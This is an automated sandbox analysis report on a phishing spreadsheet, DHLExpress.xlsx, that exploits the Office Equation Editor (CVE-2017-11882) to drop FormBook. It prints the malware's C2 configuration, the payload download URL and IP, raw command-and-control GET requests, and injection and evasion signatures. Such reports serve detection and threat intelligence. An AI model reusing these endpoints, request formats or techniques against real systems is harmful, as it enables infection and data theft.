Windows Analysis Report DHLExpress.xlsx

Overview

General Information

Sample Name: DHLExpress.xlsx
Analysis ID: 553114
MD5: 2b9a745d1c8ffca624c71ca72c0534dd
SHA1: ec28b316b4fab0a9432b013a550f3bbdbff69b92
SHA256: 2174bb3aa9e77eecd21ad4b0fdd340a034db7c815da7a7c9d51d288777984718
Tags: DHL, VelvetSweatshop, xlsx
Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read data from the clipboard

Classification

AV Detection:

Found malware configuration
Source: 00000007.00000002.670422841.00000000000C0000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.searakloset.com/bc93/"], "decoy": ["girlbutcher.com", "jfue984fs.xyz", "tov-avramivka.com", "dinglicf.com", "dvinecreationsxo.com", "countryconcerttickets.com", "gementh.com", "wenyab888.net", "xquisiteonecreditservices.com", "macklawrence.com", "4doyq.com", "china-ycgw.com", "millebelt.com", "iranianroom.com", "allgamescracked.com", "globalengineeringtnpasumo6.xyz", "fornerds.academy", "app4fan.com", "atlantahousingsolutions.com", "brandingspirits.com", "lauraimoveis.com", "selldistrict.com", "luxuryneverhurts.club", "jktyremanufacturingconclave.com", "lightrobotics.tech", "requiemme.com", "ippcservices.com", "chiplorain.com", "respectfullycannabisco.com", "diomond.com", "mbah-jamal-store.online", "cwindustrials.com", "zedexbank.com", "businessenetwork.com", "ceser33.com", "wilesmcmichael.com", "bromeliamart.com", "louisesshop.com", "sweetiemebee.com", "forex-tradingcapital.com", "softwaretestingbox.com", "localmay.com", "almaherapromo.store", "300dh.top", "exoticduchess.com", "zwork.net", "bluecrypto.xyz", "cqjjqc.com", "assetbutthealth.com", "comercioexpresschilpancingo.com", "exodiruis.com", "fitnsfreak.com", "heigray.xyz", "antepenult.com", "jsicapitallp.com", "boardwalksnj.com", "annamimtedemureworkshop.com", "qdguoji.com", "hscc100.com", "larryy.online", "connectprimerv.com", "escolaparaomundo.online", "lovelilly.net", "rcigzbvx.xyz"]}
Multi AV Scanner detection for submitted file
Source: DHLExpress.xlsx ReversingLabs: Detection: 32%
Yara detected FormBook
Source: Yara match File source: 00000006.00000000.487305412.0000000009552000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.670422841.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.670529707.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505237458.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.670482603.0000000000290000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505715407.00000000023E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.467163714.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505257053.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.496333935.0000000009552000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.466568684.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.465993067.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.465344167.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://103.167.92.57/winos11pro/vbc.exe Avira URL Cloud: Label: malware
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 7.2.cmd.exe.58e4b8.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 5.2.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.cmd.exe.28d796c.6.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 5.0.vbc.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.0.unpack Avira: Label: TR/Patched.Ren.Gen2
Source: 5.0.vbc.exe.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.vbc.exe.580000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.1.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: cmd.pdb,$ source: vbc.exe, 00000005.00000003.504155697.000000000028C000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000003.468159322.0000000000590000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.505533328.00000000008A0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.466750651.0000000000430000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.505403506.0000000000720000.00000040.00000001.sdmp, cmd.exe
Source: Binary string: cmd.pdb,$>J6$>J@$>J source: vbc.exe, 00000005.00000002.505732273.0000000002410000.00000040.00020000.sdmp, vbc.exe, 00000005.00000003.504182162.00000000002CA000.00000004.00000001.sdmp
Source: Binary string: cmd.pdb source: vbc.exe, 00000005.00000002.505732273.0000000002410000.00000040.00020000.sdmp, vbc.exe, 00000005.00000003.504155697.000000000028C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.504182162.00000000002CA000.00000004.00000001.sdmp, cmd.exe
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405D7C FindFirstFileA,FindClose, 4_2_00405D7C
Source: C:\Users\Public\vbc.exe Code function: 4_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 4_2_004053AA
Source: C:\Users\Public\vbc.exe Code function: 4_2_00402630 FindFirstFileA, 4_2_00402630
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A3E0202 FindFirstFileW,GetFullPathNameW,RemoveDirectoryW,RemoveDirectoryW,GetLastError,GetLastError,GetFileAttributesW,SetFileAttributesW,RemoveDirectoryW,GetLastError, 7_2_4A3E0202
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A3C2E73 FindFirstFileExW,GetLastError,FindClose,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 7_2_4A3C2E73
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A3C6E47 GetFileAttributesW,FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 7_2_4A3C6E47
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A3DBF0C FindFirstFileW,FindNextFileW,FindClose, 7_2_4A3DBF0C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A3CBBA4 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,FindNextFileW,GetLastError,FindClose, 7_2_4A3CBBA4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A3E0492 FindFirstFileW,FindFirstFileW,FindClose,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetLastError,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,FindNextFileW,FindClose, 7_2_4A3E0492

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.chiplorain.com
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 103.167.92.57:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 103.167.92.57:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 34.102.136.180:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 172.67.178.13 80
Source: C:\Windows\explorer.exe Domain query: www.chiplorain.com
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80
Source: C:\Windows\explorer.exe Domain query: www.louisesshop.com
Source: C:\Windows\explorer.exe Domain query: www.atlantahousingsolutions.com
Source: C:\Windows\explorer.exe Domain query: www.searakloset.com
Source: C:\Windows\explorer.exe Domain query: www.lauraimoveis.com
Source: C:\Windows\explorer.exe Network Connect: 156.67.74.112 80
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Network Connect: 172.67.207.77 80
Performs DNS queries to domains with low reputation
Source: DNS query: www.heigray.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.searakloset.com/bc93/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: TESONETLT
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected:
GET /bc93/?DD=h0Dd6TfP&5jMx_fYX=m45wz0yJH0eU0AdWNIhpnj7O98T4qieiIfcSO4QQLTkRI2A85Oo6eqE9guaDClHK+tDn+A== HTTP/1.1
Host: www.chiplorain.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Source: global traffic HTTP traffic detected:
GET /bc93/?5jMx_fYX=/0p52NrLw6/lfqJ/6i2KRqaclY9EGZAkl3iVYOjyKH0fSpE9MHsWsCd4MfgGNBa7PLwApw==&DD=h0Dd6TfP HTTP/1.1
Host: www.searakloset.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Source: global traffic HTTP traffic detected:
GET /bc93/?DD=h0Dd6TfP&5jMx_fYX=45pLxo9kavwG0b6/ageG5KZoyEg3RdGQG9PSgAgmCz2Hqkg+0QkW1XX316CwBWlYmM0BuA== HTTP/1.1
Host: www.lauraimoveis.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Source: global traffic HTTP traffic detected:
GET /bc93/?5jMx_fYX=NJ8vjIFYwVF+K1Zn/AGorNaFwyaz0G/XgrC+2klBX/IapeezUPO8bi3RGsgrxJXS1LqH5g==&DD=h0Dd6TfP HTTP/1.1
Host: www.atlantahousingsolutions.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Source: global traffic HTTP traffic detected:
GET /bc93/?DD=h0Dd6TfP&5jMx_fYX=Dtwu72sJ/YpTMebBbpFICpD7OPufwyJSP0x6RFU6mEZA3uDfPjbVMUZhI3MTljxZrpV9GA== HTTP/1.1
Host: www.louisesshop.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Source: global traffic HTTP traffic detected:
GET /bc93/?5jMx_fYX=LW5horzSF3uc1GWuNtjePQyf7tqmMuH+apCXxYGRs9OB+DuQ+Cegeibn8pPPEnsybp118Q==&DD=h0Dd6TfP HTTP/1.1
Host: www.heigray.xyz
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 3.64.163.50
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected:
HTTP/1.1 200 OK
Date: Fri, 14 Jan 2022 09:39:01 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
Last-Modified: Fri, 14 Jan 2022 04:42:48 GMT
ETag: "3cb6a-5d5836f56e1be"
Accept-Ranges: bytes
Content-Length: 248682
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
Data Raw: (hex dump of the downloaded PE image omitted)
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
GET /winos11pro/vbc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 103.167.92.57
Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
HTTP/1.1 403 Forbidden
Server: openresty
Date: Fri, 14 Jan 2022 09:40:25 GMT
Content-Type: text/html
Content-Length: 275
ETag: "618be735-113"
Via: 1.1 google
Connection: close
Data Raw: (hex dump omitted; decoded body follows)
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected:
HTTP/1.1 403 Forbidden
Server: openresty
Date: Fri, 14 Jan 2022 09:40:46 GMT
Content-Type: text/html
Content-Length: 275
ETag: "618be75c-113"
Via: 1.1 google
Connection: close
Data Raw: (hex dump omitted; decoded body follows)
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: explorer.exe, 00000006.00000000.490679146.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: vbc.exe, 00000004.00000002.468655111.0000000003380000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.485305866.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.534240186.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.469616114.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.491323055.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.491323055.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, vbc.exe, 00000004.00000000.460654323.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000004.00000002.467065994.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.463715625.0000000000409000.00000008.00020000.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: vbc.exe, 00000004.00000000.460654323.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000004.00000002.467065994.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.463715625.0000000000409000.00000008.00020000.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe, 00000004.00000002.467728024.0000000002250000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.488931984.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.473278580.0000000003E50000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.491323055.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000004.00000002.468655111.0000000003380000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.485305866.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: vbc.exe, 00000004.00000002.468655111.0000000003380000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.485305866.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.491323055.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.467728024.0000000002250000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.488931984.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.534240186.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.469616114.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: vbc.exe, 00000004.00000002.468655111.0000000003380000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.485305866.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.490679146.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.491323055.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe, 00000004.00000002.468655111.0000000003380000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.485305866.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.495867140.00000000083B5000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/c
Source: explorer.exe, 00000006.00000000.495867140.00000000083B5000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.474003432.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493049861.000000000447A000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.495867140.00000000083B5000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493049861.000000000447A000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.495867140.00000000083B5000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.490679146.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.534240186.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.469616114.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.534240186.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.469616114.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.534240186.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.469616114.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\64631AC.emf
Source: unknown DNS traffic detected: queries for: www.chiplorain.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to read data from the clipboard
Source: C:\Users\Public\vbc.exe Code function: 4_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 4_2_00404F61

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000006.00000000.487305412.0000000009552000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.670422841.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.670529707.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505237458.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.670482603.0000000000290000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505715407.00000000023E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.467163714.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505257053.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.496333935.0000000009552000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.466568684.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.465993067.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.465344167.0000000000400000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000006.00000000.487305412.0000000009552000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.487305412.0000000009552000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.670422841.00000000000C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.670422841.00000000000C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.670529707.00000000002C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.670529707.00000000002C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.505237458.00000000003D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.505237458.00000000003D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.670482603.0000000000290000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.670482603.0000000000290000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.505715407.00000000023E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.505715407.00000000023E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.467163714.0000000000580000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.467163714.0000000000580000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.505257053.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.505257053.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.496333935.0000000009552000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.496333935.0000000009552000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000001.466568684.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000001.466568684.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.465993067.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.465993067.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.465344167.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.465344167.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Yara signature match
Source: 00000006.00000000.487305412.0000000009552000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.487305412.0000000009552000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.670422841.00000000000C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.670422841.00000000000C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
